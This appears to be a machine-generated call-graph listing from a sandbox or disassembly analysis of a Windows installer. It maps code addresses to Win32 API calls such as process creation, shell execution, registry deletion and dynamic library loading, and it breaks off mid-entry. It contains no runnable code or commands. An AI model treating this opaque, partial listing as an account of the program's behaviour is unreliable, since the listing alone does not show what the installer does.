4014->4016 4015->4019 4016->4019 4020->4019 4021->4019 4022 40164d 4023 402ad0 18 API calls 4022->4023 4024 401653 4023->4024 4025 4061e5 2 API calls 4024->4025 4026 401659 4025->4026 4027 4019cf 4028 402ad0 18 API calls 4027->4028 4029 4019d6 4028->4029 4030 402ad0 18 API calls 4029->4030 4031 4019df 4030->4031 4032 4019e6 lstrcmpiW 4031->4032 4033 4019f8 lstrcmpW 4031->4033 4034 4019ec 4032->4034 4033->4034 3333 401e51 3334 402ad0 18 API calls 3333->3334 3335 401e57 3334->3335 3336 405156 25 API calls 3335->3336 3337 401e61 3336->3337 3351 405624 CreateProcessW 3337->3351 3340 401ec6 CloseHandle 3344 402729 3340->3344 3341 401e77 WaitForSingleObject 3342 401e89 3341->3342 3343 401e9b GetExitCodeProcess 3342->3343 3347 406245 2 API calls 3342->3347 3345 401eba 3343->3345 3346 401ead 3343->3346 3345->3340 3349 401eb8 3345->3349 3354 405de9 wsprintfW 3346->3354 3350 401e90 WaitForSingleObject 3347->3350 3349->3340 3350->3342 3352 405653 CloseHandle 3351->3352 3353 401e67 3351->3353 3352->3353 3353->3340 3353->3341 3353->3344 3354->3349 3355 402251 3356 402259 3355->3356 3358 40225f 3355->3358 3357 402ad0 18 API calls 3356->3357 3357->3358 3359 40226d 3358->3359 3360 402ad0 18 API calls 3358->3360 3361 40227b 3359->3361 3363 402ad0 18 API calls 3359->3363 3360->3359 3362 402ad0 18 API calls 3361->3362 3364 402284 WritePrivateProfileStringW 3362->3364 3363->3361 4035 4028d1 4036 402ab3 18 API calls 4035->4036 4037 4028d7 4036->4037 4038 4028e5 4037->4038 4039 40290a 4037->4039 4041 402729 4037->4041 4038->4041 4043 405de9 wsprintfW 4038->4043 4040 405ec4 18 API calls 4039->4040 4039->4041 4040->4041 4043->4041 3365 402452 3376 402bda 3365->3376 3367 40245c 3368 402ab3 18 API calls 3367->3368 3369 402465 3368->3369 3370 402470 3369->3370 3373 402729 3369->3373 3371 402489 RegEnumValueW 3370->3371 3372 40247d RegEnumKeyW 3370->3372 3371->3373 3374 4024a2 RegCloseKey 3371->3374 3372->3374 3374->3373 3377 402ad0 18 API calls 3376->3377 3378 402bf3 3377->3378 3379 402c01 RegOpenKeyExW 3378->3379 3379->3367 3380 401752 3381 402ad0 18 API calls 3380->3381 3382 401759 3381->3382 3383 401781 3382->3383 3384 401779 3382->3384 3420 405ea2 lstrcpynW 3383->3420 3419 405ea2 lstrcpynW 3384->3419 3387 40177f 3391 406136 5 API calls 3387->3391 3388 40178c 3389 40590a 3 API calls 3388->3389 3390 401792 lstrcatW 3389->3390 3390->3387 3393 40179e 3391->3393 3392 4061e5 2 API calls 3392->3393 3393->3392 3394 405b06 2 API calls 3393->3394 3396 4017b0 CompareFileTime 3393->3396 3397 401870 3393->3397 3398 401847 3393->3398 3400 405ea2 lstrcpynW 3393->3400 3406 405ec4 18 API calls 3393->3406 3418 405b2b GetFileAttributesW CreateFileW 3393->3418 3421 405685 3393->3421 3394->3393 3396->3393 3399 405156 25 API calls 3397->3399 3402 405156 25 API calls 3398->3402 3408 40185c 3398->3408 3401 40187a 3399->3401 3400->3393 3403 402ff8 48 API calls 3401->3403 3402->3408 3404 40188d 3403->3404 3405 4018a1 SetFileTime 3404->3405 3407 4018b3 CloseHandle 3404->3407 3405->3407 3406->3393 3407->3408 3409 4018c4 3407->3409 3410 4018c9 3409->3410 3411 4018dc 3409->3411 3413 405ec4 18 API calls 3410->3413 3412 405ec4 18 API calls 3411->3412 3414 4018e4 3412->3414 3416 4018d1 lstrcatW 3413->3416 3417 405685 MessageBoxIndirectW 3414->3417 3416->3414 3417->3408 3418->3393 3419->3387 3420->3388 3422 40569a 3421->3422 3423 4056e6 3422->3423 3424 4056ae MessageBoxIndirectW 3422->3424 3423->3393 3424->3423 4044 404ad2 GetDlgItem GetDlgItem 4045 404b24 7 API calls 4044->4045 4057 404d3d 4044->4057 4046 404bc7 DeleteObject 4045->4046 4047 404bba SendMessageW 4045->4047 4048 404bd0 4046->4048 4047->4046 4050 404c07 4048->4050 4051 405ec4 18 API calls 4048->4051 4049 404e21 4053 404ecd 4049->4053 4059 404d30 4049->4059 4064 404e7a SendMessageW 4049->4064 4052 4040f1 19 API calls 4050->4052 4054 404be9 SendMessageW SendMessageW 4051->4054 4058 404c1b 4052->4058 4055 404ed7 SendMessageW 4053->4055 4056 404edf 4053->4056 4054->4048 4055->4056 4066 404ef1 ImageList_Destroy 4056->4066 4067 404ef8 4056->4067 4075 404f08 4056->4075 4057->4049 4062 404a20 5 API calls 4057->4062 4078 404dae 4057->4078 4063 4040f1 19 API calls 4058->4063 4060 404158 8 API calls 4059->4060 4065 4050c3 4060->4065 4061 404e13 SendMessageW 4061->4049 4062->4078 4079 404c29 4063->4079 4064->4059 4069 404e8f SendMessageW 4064->4069 4066->4067 4070 404f01 GlobalFree 4067->4070 4067->4075 4068 405077 4068->4059 4073 405089 ShowWindow GetDlgItem ShowWindow 4068->4073 4072 404ea2 4069->4072 4070->4075 4071 404cfe GetWindowLongW SetWindowLongW 4074 404d17 4071->4074 4080 404eb3 SendMessageW 4072->4080 4073->4059 4076 404d35 4074->4076 4077 404d1d ShowWindow 4074->4077 4075->4068 4085 404aa0 4 API calls 4075->4085 4091 404f43 4075->4091 4096 404126 SendMessageW 4076->4096 4095 404126 SendMessageW 4077->4095 4078->4049 4078->4061 4079->4071 4081 404cf8 4079->4081 4084 404c79 SendMessageW 4079->4084 4086 404cb5 SendMessageW 4079->4086 4087 404cc6 SendMessageW 4079->4087 4080->4053 4081->4071 4081->4074 4084->4079 4085->4091 4086->4079 4087->4079 4088 40504d InvalidateRect 4088->4068 4089 405063 4088->4089 4097 40493a 4089->4097 4090 404f71 SendMessageW 4092 404f87 4090->4092 4091->4090 4091->4092 4092->4088 4094 404ffb SendMessageW SendMessageW 4092->4094 4094->4092 4095->4059 4096->4057 4098 404957 4097->4098 4099 405ec4 18 API calls 4098->4099 4100 40498c 4099->4100 4101 405ec4 18 API calls 4100->4101 4102 404997 4101->4102 4103 405ec4 18 API calls 4102->4103 4104 4049c8 lstrlenW wsprintfW SetDlgItemTextW 4103->4104 4104->4068 3425 4022d3 3426 402303 3425->3426 3427 4022d8 3425->3427 3429 402ad0 18 API calls 3426->3429 3428 402bda 19 API calls 3427->3428 3430 4022df 3428->3430 3431 40230a 3429->3431 3432 4022e9 3430->3432 3437 402322 3430->3437 3438 402b10 RegOpenKeyExW 3431->3438 3433 402ad0 18 API calls 3432->3433 3435 4022f0 RegDeleteValueW RegCloseKey 3433->3435 3435->3437 3445 402b3b 3438->3445 3447 402320 3438->3447 3439 402b61 RegEnumKeyW 3440 402b73 RegCloseKey 3439->3440 3439->3445 3442 40620c 3 API calls 3440->3442 3441 402b98 RegCloseKey 3441->3447 3444 402b83 3442->3444 3443 402b10 3 API calls 3443->3445 3446 402bb3 RegDeleteKeyW 3444->3446 3444->3447 3445->3439 3445->3440 3445->3441 3445->3443 3446->3447 3447->3437 4105 4048d4 4106 404900 4105->4106 4107 4048e4 4105->4107 4109 404933 4106->4109 4110 404906 SHGetPathFromIDListW 4106->4110 4116 405669 GetDlgItemTextW 4107->4116 4112 404916 4110->4112 4115 40491d SendMessageW 4110->4115 4111 4048f1 SendMessageW 4111->4106 4113 40140b 2 API calls 4112->4113 4113->4115 4115->4109 4116->4111 4117 401ed4 4118 402ad0 18 API calls 4117->4118 4119 401edb 4118->4119 4120 4061e5 2 API calls 4119->4120 4121 401ee1 4120->4121 4123 401ef2 4121->4123 4124 405de9 wsprintfW 4121->4124 4124->4123 4125 4014d7 4126 402ab3 18 API calls 4125->4126 4127 4014dd Sleep 4126->4127 4129 40295d 4127->4129 4130 40155b 4131 402903 4130->4131 4134 405de9 wsprintfW 4131->4134 4133 402908 4134->4133 4142 4026dc 4143 4026db 4142->4143 4143->4142 4144 4026ec FindNextFileW 4143->4144 4145 4026f7 4143->4145 4144->4145 4146 40273e 4144->4146 4148 405ea2 lstrcpynW 4146->4148 4148->4145 3871 40165e 3872 402ad0 18 API calls 3871->3872 3873 401665 3872->3873 3874 402ad0 18 API calls 3873->3874 3875 40166e 3874->3875 3876 402ad0 18 API calls 3875->3876 3877 401677 MoveFileW 3876->3877 3878 401683 3877->3878 3879 40168a 3877->3879 3881 401423 25 API calls 3878->3881 3880 4061e5 2 API calls 3879->3880 3883 402195 3879->3883 3882 401699 3880->3882 3881->3883 3882->3883 3884 405d3c 40 API calls 3882->3884 3884->3878 3885 4023de 3886 402bda 19 API calls 3885->3886 3887 4023e8 3886->3887 3888 402ad0 18 API calls 3887->3888 3889 4023f1 3888->3889 3890 4023fc RegQueryValueExW 3889->3890 3893 402729 3889->3893 3891 402422 RegCloseKey 3890->3891 3892 40241c 3890->3892 3891->3893 3892->3891 3896 405de9 wsprintfW 3892->3896 3896->3891 4149 401ce5 GetDlgItem GetClientRect 4150 402ad0 18 API calls 4149->4150 4151 401d17 LoadImageW SendMessageW 4150->4151 4152 401d35 DeleteObject 4151->4152 4153 40295d 4151->4153 4152->4153 3229 40206a 3230 402ad0 18 API calls 3229->3230 3231 402071 3230->3231 3232 402ad0 18 API calls 3231->3232 3233 40207b 3232->3233 3234 402ad0 18 API calls 3233->3234 3235 402084 3234->3235 3236 402ad0 18 API calls 3235->3236 3237 40208e 3236->3237 3238 402ad0 18 API calls 3237->3238 3239 402098 3238->3239 3240 4020ac CoCreateInstance 3239->3240 3241 402ad0 18 API calls 3239->3241 3242 4020cb 3240->3242 3241->3240 3244 402195 3242->3244 3245 401423 3242->3245 3246 405156 25 API calls 3245->3246 3247 401431 3246->3247 3247->3244 3251 40156b 3252 401584 3251->3252 3253 40157b ShowWindow 3251->3253 3254 401592 ShowWindow 3252->3254 3255 40295d 3252->3255 3253->3252 3254->3255 4161 4024ec 4162 4024f1 4161->4162 4163 40250a 4161->4163 4164 402ab3 18 API calls 4162->4164 4165 402510 4163->4165 4166 40253c 4163->4166 4172 4024f8 4164->4172 4167 402ad0 18 API calls 4165->4167 4168 402ad0 18 API calls 4166->4168 4169 402517 WideCharToMultiByte lstrlenA 4167->4169 4170 402543 lstrlenW 4168->4170 4169->4172 4170->4172 4171 402729 4172->4171 4173 402565 WriteFile 4172->4173 4173->4171 4174 4018ef 4175 401926 4174->4175 4176 402ad0 18 API calls 4175->4176 4177 40192b 4176->4177 4178 405731 71 API calls 4177->4178 4179 401934 4178->4179 4180 402571 4181 402ab3 18 API calls 4180->4181 4186 40257a 4181->4186 4182 402642 4183 4025c1 ReadFile 4183->4182 4183->4186 4184 4025fe ReadFile 4184->4182 4184->4186 4185 4025de MultiByteToWideChar 4185->4186 4186->4182 4186->4183 4186->4184 4186->4185 4187 402644 4186->4187 4188 402655 4186->4188 4191 405de9 wsprintfW 4187->4191 4188->4182 4190 402671 SetFilePointer 4188->4190 4190->4182 4191->4182 4192 4014f1 SetForegroundWindow 4193 40295d 4192->4193 4194 4018f2 4195 402ad0 18 API calls 4194->4195 4196 4018f9 4195->4196 4197 405685 MessageBoxIndirectW 4196->4197 4198 401902 4197->4198 3448 401df3 3449 402ad0 18 API calls 3448->3449 3450 401df9 3449->3450 3451 402ad0 18 API calls 3450->3451 3452 401e02 3451->3452 3453 402ad0 18 API calls 3452->3453 3454 401e0b 3453->3454 3455 402ad0 18 API calls 3454->3455 3456 401e14 3455->3456 3457 401423 25 API calls 3456->3457 3458 401e1b ShellExecuteW 3457->3458 3459 401e4c 3458->3459 4204 4064f7 4205 40637b 4204->4205 4206 406ce6 4205->4206 4207 406405 GlobalAlloc 4205->4207 4208 4063fc GlobalFree 4205->4208 4209 406473 GlobalFree 4205->4209 4210 40647c GlobalAlloc 4205->4210 4207->4205 4207->4206 4208->4207 4209->4210 4210->4205 4210->4206 4211 4014ff 4212 401507 4211->4212 4214 40151a 4211->4214 4213 402ab3 18 API calls 4212->4213 4213->4214 4215 401000 4216 401037 BeginPaint GetClientRect 4215->4216 4217 40100c DefWindowProcW 4215->4217 4219 4010f3 4216->4219 4220 401179 4217->4220 4221 401073 CreateBrushIndirect FillRect DeleteObject 4219->4221 4222 4010fc 4219->4222 4221->4219 4223 401102 CreateFontIndirectW 4222->4223 4224 401167 EndPaint 4222->4224 4223->4224 4225 401112 6 API calls 4223->4225 4224->4220 4225->4224 4226 401a00 4227 402ad0 18 API calls 4226->4227 4228 401a09 ExpandEnvironmentStringsW 4227->4228 4229 401a1d 4228->4229 4231 401a30 4228->4231 4230 401a22 lstrcmpW 4229->4230 4229->4231 4230->4231 4239 401b01 4240 402ad0 18 API calls 4239->4240 4241 401b08 4240->4241 4242 402ab3 18 API calls 4241->4242 4243 401b11 wsprintfW 4242->4243 4244 40295d 4243->4244 4245 404205 lstrcpynW lstrlenW 3186 402706 3187 402ad0 18 API calls 3186->3187 3188 40270d FindFirstFileW 3187->3188 3189 402735 3188->3189 3192 402720 3188->3192 3194 405de9 wsprintfW 3189->3194 3191 40273e 3195 405ea2 lstrcpynW 3191->3195 3194->3191 3195->3192 4246 401f08 4247 402ad0 18 API calls 4246->4247 4248 401f0f GetFileVersionInfoSizeW 4247->4248 4249 401f36 GlobalAlloc 4248->4249 4250 401f8c 4248->4250 4249->4250 4251 401f4a GetFileVersionInfoW 4249->4251 4251->4250 4252 401f59 VerQueryValueW 4251->4252 4252->4250 4253 401f72 4252->4253 4257 405de9 wsprintfW 4253->4257 4255 401f7e 4258 405de9 wsprintfW 4255->4258 4257->4255 4258->4250 4259 40458c 4260 4045b8 4259->4260 4261 4045c9 4259->4261 4320 405669 GetDlgItemTextW 4260->4320 4263 4045d5 GetDlgItem 4261->4263 4295 404634 4261->4295 4265 4045e9 4263->4265 4264 4045c3 4267 406136 5 API calls 4264->4267 4268 4045fd SetWindowTextW 4265->4268 4272 4059b5 4 API calls 4265->4272 4266 404718 4269 4048b9 4266->4269 4322 405669 GetDlgItemTextW 4266->4322 4267->4261 4273 4040f1 19 API calls 4268->4273 4271 404158 8 API calls 4269->4271 4276 4048cd 4271->4276 4277 4045f3 4272->4277 4278 404619 4273->4278 4274 405ec4 18 API calls 4279 4046a8 SHBrowseForFolderW 4274->4279 4275 404748 4280 405a12 18 API calls 4275->4280 4277->4268 4286 40590a 3 API calls 4277->4286 4281 4040f1 19 API calls 4278->4281 4279->4266 4282 4046c0 CoTaskMemFree 4279->4282 4283 40474e 4280->4283 4284 404627 4281->4284 4285 40590a 3 API calls 4282->4285 4323 405ea2 lstrcpynW 4283->4323 4321 404126 SendMessageW 4284->4321 4288 4046cd 4285->4288 4286->4268 4291 404704 SetDlgItemTextW 4288->4291 4296 405ec4 18 API calls 4288->4296 4290 40462d 4293 40620c 3 API calls 4290->4293 4291->4266 4292 404765 4294 40620c 3 API calls 4292->4294 4293->4295 4303 40476d 4294->4303 4295->4266 4295->4269 4295->4274 4297 4046ec lstrcmpiW 4296->4297 4297->4291 4300 4046fd lstrcatW 4297->4300 4298 4047ac 4324 405ea2 lstrcpynW 4298->4324 4300->4291 4301 4047b3 4302 4059b5 4 API calls 4301->4302 4304 4047b9 GetDiskFreeSpaceW 4302->4304 4303->4298 4307 405956 2 API calls 4303->4307 4309 4047fe 4303->4309 4306 4047dc MulDiv 4304->4306 4304->4309 4306->4309 4307->4303 4308 404868 4311 40488b 4308->4311 4313 40140b 2 API calls 4308->4313 4309->4308 4310 40493a 21 API calls 4309->4310 4312 40485a 4310->4312 4325 404113 KiUserCallbackDispatcher 4311->4325 4314 40486a SetDlgItemTextW 4312->4314 4315 40485f 4312->4315 4313->4311 4314->4308 4318 40493a 21 API calls 4315->4318 4317 4048a7 4317->4269 4326 404521 4317->4326 4318->4308 4320->4264 4321->4290 4322->4275 4323->4292 4324->4301 4325->4317 4327 404534 SendMessageW 4326->4327 4328 40452f 4326->4328 4327->4269 4328->4327 4329 40428e 4330 4042a6 4329->4330 4336 4043c0 4329->4336 4337 4040f1 19 API calls 4330->4337 4331 40442a 4332 404434 GetDlgItem 4331->4332 4333 4044fc 4331->4333 4334 4044bd 4332->4334 4335 40444e 4332->4335 4338 404158 8 API calls 4333->4338 4334->4333 4343 4044cf 4334->4343 4335->4334 4342 404474 6 API calls 4335->4342 4336->4331 4336->4333 4339 4043fb GetDlgItem SendMessageW 4336->4339 4340 40430d 4337->4340 4350 4044f7 4338->4350 4360 404113 KiUserCallbackDispatcher 4339->4360 4341 4040f1 19 API calls 4340->4341 4345 40431a CheckDlgButton 4341->4345 4342->4334 4346 4044e5 4343->4346 4347 4044d5 SendMessageW 4343->4347 4358 404113 KiUserCallbackDispatcher 4345->4358 4346->4350 4351 4044eb SendMessageW 4346->4351 4347->4346 4348 404425 4352 404521 SendMessageW 4348->4352 4351->4350 4352->4331 4353 404338 GetDlgItem 4359 404126 SendMessageW 4353->4359 4355 40434e SendMessageW 4356 404374 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4355->4356 4357 40436b GetSysColor 4355->4357 4356->4350 4357->4356 4358->4353 4359->4355 4360->4348 4361 401c8e 4362 402ab3 18 API calls 4361->4362 4363 401c94 IsWindow 4362->4363 4364 4019f0 4363->4364 4365 40268f 4366 402696 4365->4366 4368 402908 4365->4368 4367 402ab3 18 API calls 4366->4367 4369 4026a1 4367->4369 4370 4026a8 SetFilePointer 4369->4370 4370->4368 4371 4026b8 4370->4371 4373 405de9 wsprintfW 4371->4373 4373->4368 4374 401491 4375 405156 25 API calls 4374->4375 4376 401498 4375->4376 4377 402293 4378 402ad0 18 API calls 4377->4378 4379 4022a2 4378->4379 4380 402ad0 18 API calls 4379->4380 4381 4022ab 4380->4381 4382 402ad0 18 API calls 4381->4382 4383 4022b5 GetPrivateProfileStringW 4382->4383 3460 405295 3461 405441 3460->3461 3462 4052b6 GetDlgItem GetDlgItem GetDlgItem 3460->3462 3464 40544a GetDlgItem CreateThread CloseHandle 3461->3464 3466 405472 3461->3466 3506 404126 SendMessageW 3462->3506 3464->3466 3529 405229 OleInitialize 3464->3529 3465 405327 3472 40532e GetClientRect GetSystemMetrics SendMessageW SendMessageW 3465->3472 3467 40549d 3466->3467 3468 405489 ShowWindow ShowWindow 3466->3468 3469 4054bf 3466->3469 3470 4054fb 3467->3470 3474 4054d4 ShowWindow 3467->3474 3475 4054ae 3467->3475 3511 404126 SendMessageW 3468->3511 3515 404158 3469->3515 3470->3469 3481 405506 SendMessageW 3470->3481 3479 405381 SendMessageW SendMessageW 3472->3479 3480 40539d 3472->3480 3477 4054f4 3474->3477 3478 4054e6 3474->3478 3512 4040ca 3475->3512 3476 4054cd 3484 4040ca SendMessageW 3477->3484 3483 405156 25 API calls 3478->3483 3479->3480 3485 4053b0 3480->3485 3486 4053a2 SendMessageW 3480->3486 3481->3476 3487 40551f CreatePopupMenu 3481->3487 3483->3477 3484->3470 3507 4040f1 3485->3507 3486->3485 3488 405ec4 18 API calls 3487->3488 3490 40552f AppendMenuW 3488->3490 3492 405542 GetWindowRect 3490->3492 3493 405555 3490->3493 3491 4053c0 3494 4053c9 ShowWindow 3491->3494 3495 4053fd GetDlgItem SendMessageW 3491->3495 3496 40555e TrackPopupMenu 3492->3496 3493->3496 3497 4053ec 3494->3497 3498 4053df ShowWindow 3494->3498 3495->3476 3499 405424 SendMessageW SendMessageW 3495->3499 3496->3476 3500 40557c 3496->3500 3510 404126 SendMessageW 3497->3510 3498->3497 3499->3476 3501 405598 SendMessageW 3500->3501 3501->3501 3503 4055b5 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3501->3503 3504 4055da SendMessageW 3503->3504 3504->3504 3505 405603 GlobalUnlock SetClipboardData CloseClipboard 3504->3505 3505->3476 3506->3465 3508 405ec4 18 API calls 3507->3508 3509 4040fc SetDlgItemTextW 3508->3509 3509->3491 3510->3495 3511->3467 3513 4040d1 3512->3513 3514 4040d7 SendMessageW 3512->3514 3513->3514 3514->3469 3516 404170 GetWindowLongW 3515->3516 3517 4041f9 3515->3517 3516->3517 3518 404181 3516->3518 3517->3476 3519 404190 GetSysColor 3518->3519 3520 404193 3518->3520 3519->3520 3521 4041a3 SetBkMode 3520->3521 3522 404199 SetTextColor 3520->3522 3523 4041c1 3521->3523 3524 4041bb GetSysColor 3521->3524 3522->3521 3525 4041d2 3523->3525 3526 4041c8 SetBkColor 3523->3526 3524->3523 3525->3517 3527 4041e5 DeleteObject 3525->3527 3528 4041ec CreateBrushIndirect 3525->3528 3526->3525 3527->3528 3528->3517 3536 40413d 3529->3536 3531 40524c 3535 405273 3531->3535 3539 401389 3531->3539 3532 40413d SendMessageW 3533 405285 OleUninitialize 3532->3533 3535->3532 3537 404155 3536->3537 3538 404146 SendMessageW 3536->3538 3537->3531 3538->3537 3541 401390 3539->3541 3540 4013fe 3540->3531 3541->3540 3542 4013cb MulDiv SendMessageW 3541->3542 3542->3541 4384 402c15 4385 402c40 4384->4385 4386 402c27 SetTimer 4384->4386 4387 402c8e 4385->4387 4388 402c94 MulDiv 4385->4388 4386->4385 4389 402c4e wsprintfW SetWindowTextW SetDlgItemTextW 4388->4389 4389->4387 3543 401f98 3544 40205c 3543->3544 3545 401faa 3543->3545 3547 401423 25 API calls 3544->3547 3546 402ad0 18 API calls 3545->3546 3548 401fb1 3546->3548 3554 402195 3547->3554 3549 402ad0 18 API calls 3548->3549 3550 401fba 3549->3550 3551 401fd0 LoadLibraryExW 3550->3551 3552 401fc2 GetModuleHandleW 3550->3552 3551->3544 3553 401fe1 3551->3553 3552->3551 3552->3553 3563 406278 WideCharToMultiByte 3553->3563 3557 401ff2 3560 401423 25 API calls 3557->3560 3561 402002 3557->3561 3558 40202b 3559 405156 25 API calls 3558->3559 3559->3561 3560->3561 3561->3554 3562 40204e FreeLibrary 3561->3562 3562->3554 3564 4062a2 GetProcAddress 3563->3564 3565 401fec 3563->3565 3564->3565 3565->3557 3565->3558 4398 401718 4399 402ad0 18 API calls 4398->4399 4400 40171f SearchPathW 4399->4400 4401 40173a 4400->4401 3566 403c19 3567 403c31 3566->3567 3568 403d6c 3566->3568 3567->3568 3571 403c3d 3567->3571 3569 403dbd 3568->3569 3570 403d7d GetDlgItem GetDlgItem 3568->3570 3573 403e17 3569->3573 3583 401389 2 API calls 3569->3583 3572 4040f1 19 API calls 3570->3572 3574 403c48 SetWindowPos 3571->3574 3575 403c5b 3571->3575 3578 403da7 SetClassLongW 3572->3578 3579 40413d SendMessageW 3573->3579 3599 403d67 3573->3599 3574->3575 3576 403c60 ShowWindow 3575->3576 3577 403c78 3575->3577 3576->3577 3580 403c80 DestroyWindow 3577->3580 3581 403c9a 3577->3581 3582 40140b 2 API calls 3578->3582 3593 403e29 3579->3593 3635 40407a 3580->3635 3584 403cb0 3581->3584 3585 403c9f SetWindowLongW 3581->3585 3582->3569 3586 403def 3583->3586 3589 403d59 3584->3589 3590 403cbc GetDlgItem 3584->3590 3585->3599 3586->3573 3591 403df3 SendMessageW 3586->3591 3587 40140b 2 API calls 3587->3593 3588 40407c DestroyWindow EndDialog 3588->3635 3596 404158 8 API calls 3589->3596 3594 403cec 3590->3594 3595 403ccf SendMessageW IsWindowEnabled 3590->3595 3591->3599 3592 4040ab ShowWindow 3592->3599 3593->3587 3593->3588 3597 405ec4 18 API calls 3593->3597 3593->3599 3609 4040f1 19 API calls 3593->3609 3611 4040f1 19 API calls 3593->3611 3626 403fbc DestroyWindow 3593->3626 3598 403cf1 3594->3598 3600 403cf9 3594->3600 3602 403d40 SendMessageW 3594->3602 3603 403d0c 3594->3603 3595->3594 3595->3599 3596->3599 3597->3593 3601 4040ca SendMessageW 3598->3601 3600->3598 3600->3602 3606 403d27 3601->3606 3602->3589 3604 403d14 3603->3604 3605 403d29 3603->3605 3639 40140b 3604->3639 3608 40140b 2 API calls 3605->3608 3606->3589 3610 403d30 3608->3610 3609->3593 3610->3589 3610->3598 3612 403ea4 GetDlgItem 3611->3612 3613 403ec1 ShowWindow KiUserCallbackDispatcher 3612->3613 3614 403eb9 3612->3614 3636 404113 KiUserCallbackDispatcher 3613->3636 3614->3613 3616 403eeb EnableWindow 3619 403eff 3616->3619 3617 403f04 GetSystemMenu EnableMenuItem SendMessageW 3618 403f34 SendMessageW 3617->3618 3617->3619 3618->3619 3619->3617 3637 404126 SendMessageW 3619->3637 3638 405ea2 lstrcpynW 3619->3638 3622 403f62 lstrlenW 3623 405ec4 18 API calls 3622->3623 3624 403f78 SetWindowTextW 3623->3624 3625 401389 2 API calls 3624->3625 3625->3593 3627 403fd6 CreateDialogParamW 3626->3627 3626->3635 3628 404009 3627->3628 3627->3635 3629 4040f1 19 API calls 3628->3629 3630 404014 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3629->3630 3631 401389 2 API calls 3630->3631 3632 40405a 3631->3632 3632->3599 3633 404062 ShowWindow 3632->3633 3634 40413d SendMessageW 3633->3634 3634->3635 3635->3592 3635->3599 3636->3616 3637->3619 3638->3622 3640 401389 2 API calls 3639->3640 3641 401420 3640->3641 3641->3598 3661 40159b 3662 402ad0 18 API calls 3661->3662 3663 4015a2 SetFileAttributesW 3662->3663 3664 4015b4 3663->3664 3665 40331c #17 SetErrorMode OleInitialize 3666 40620c 3 API calls 3665->3666 3667 40335f SHGetFileInfoW 3666->3667 3738 405ea2 lstrcpynW 3667->3738 3669 40338a GetCommandLineW 3739 405ea2 lstrcpynW 3669->3739 3671 40339c GetModuleHandleW 3672 4033b4 3671->3672 3673 405937 CharNextW 3672->3673 3674 4033c3 CharNextW 3673->3674 3683 4033d3 3674->3683 3675 4034a8 3676 4034bc GetTempPathW 3675->3676 3740 4032e8 3676->3740 3678 4034d4 3679 4034d8 GetWindowsDirectoryW lstrcatW 3678->3679 3680 40352e DeleteFileW 3678->3680 3684 4032e8 11 API calls 3679->3684 3748 402d52 GetTickCount GetModuleFileNameW 3680->3748 3681 405937 CharNextW 3681->3683 3683->3675 3683->3681 3688 4034aa 3683->3688 3686 4034f4 3684->3686 3685 403542 3692 405937 CharNextW 3685->3692 3723 4035ca 3685->3723 3733 4035da 3685->3733 3686->3680 3687 4034f8 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3686->3687 3691 4032e8 11 API calls 3687->3691 3832 405ea2 lstrcpynW 3688->3832 3695 403526 3691->3695 3696 40355d 3692->3696 3695->3680 3695->3733 3703 4035a4 3696->3703 3704 403609 lstrcatW lstrcmpiW 3696->3704 3697 4035f3 3700 405685 MessageBoxIndirectW 3697->3700 3698 4036e9 3699 40376c ExitProcess 3698->3699 3701 40620c 3 API calls 3698->3701 3705 403601 ExitProcess 3700->3705 3706 4036f8 3701->3706 3707 405a12 18 API calls 3703->3707 3708 403625 CreateDirectoryW SetCurrentDirectoryW 3704->3708 3704->3733 3709 40620c 3 API calls 3706->3709 3714 4035b0 3707->3714 3710 403648 3708->3710 3711 40363d 3708->3711 3713 403701 3709->3713 3845 405ea2 lstrcpynW 3710->3845 3844 405ea2 lstrcpynW 3711->3844 3716 40620c 3 API calls 3713->3716 3714->3733 3833 405ea2 lstrcpynW 3714->3833 3719 40370a 3716->3719 3718 4035bf 3834 405ea2 lstrcpynW 3718->3834 3722 403758 ExitWindowsEx 3719->3722 3728 403718 GetCurrentProcess 3719->3728 3721 405ec4 18 API calls 3724 403687 DeleteFileW 3721->3724 3722->3699 3725 403765 3722->3725 3778 403876 3723->3778 3726 403694 CopyFileW 3724->3726 3735 403656 3724->3735 3727 40140b 2 API calls 3725->3727 3726->3735 3727->3699 3732 403728 3728->3732 3729 4036dd 3730 405d3c 40 API calls 3729->3730 3730->3733 3731 405d3c 40 API calls 3731->3735 3732->3722 3835 403784 3733->3835 3734 405ec4 18 API calls 3734->3735 3735->3721 3735->3729 3735->3731 3735->3734 3736 405624 2 API calls 3735->3736 3737 4036c8 CloseHandle 3735->3737 3736->3735 3737->3735 3738->3669 3739->3671 3741 406136 5 API calls 3740->3741 3742 4032f4 3741->3742 3743 4032fe 3742->3743 3744 40590a 3 API calls 3742->3744 3743->3678 3745 403306 CreateDirectoryW 3744->3745 3846 405b5a 3745->3846 3850 405b2b GetFileAttributesW CreateFileW 3748->3850 3750 402d95 3777 402da2 3750->3777 3851 405ea2 lstrcpynW 3750->3851 3752 402db8 3753 405956 2 API calls 3752->3753 3754 402dbe 3753->3754 3852 405ea2 lstrcpynW 3754->3852 3756 402dc9 GetFileSize 3757 402eca 3756->3757 3758 402de0 3756->3758 3759 402cb0 33 API calls 3757->3759 3758->3757 3760 40329f ReadFile 3758->3760 3762 402f65 3758->3762 3769 402cb0 33 API calls 3758->3769 3758->3777 3761 402ed1 3759->3761 3760->3758 3763 402f0d GlobalAlloc 3761->3763 3761->3777 3853 4032d1 SetFilePointer 3761->3853 3766 402cb0 33 API calls 3762->3766 3765 402f24 3763->3765 3770 405b5a 2 API calls 3765->3770 3766->3777 3767 402eee 3768 40329f ReadFile 3767->3768 3771 402ef9 3768->3771 3769->3758 3772 402f35 CreateFileW 3770->3772 3771->3763 3771->3777 3773 402f6f 3772->3773 3772->3777 3854 4032d1 SetFilePointer 3773->3854 3775 402f7d 3776 402ff8 48 API calls 3775->3776 3776->3777 3777->3685 3779 40620c 3 API calls 3778->3779 3780 40388a 3779->3780 3781 403890 3780->3781 3782 4038a2 3780->3782 3864 405de9 wsprintfW 3781->3864 3783 405d6f 3 API calls 3782->3783 3784 4038d2 3783->3784 3786 4038f1 lstrcatW 3784->3786 3788 405d6f 3 API calls 3784->3788 3787 4038a0 3786->3787 3855 403b4c 3787->3855 3788->3786 3791 405a12 18 API calls 3792 403923 3791->3792 3793 4039b7 3792->3793 3795 405d6f 3 API calls 3792->3795 3794 405a12 18 API calls 3793->3794 3796 4039bd 3794->3796 3797 403955 3795->3797 3798 4039cd LoadImageW 3796->3798 3799 405ec4 18 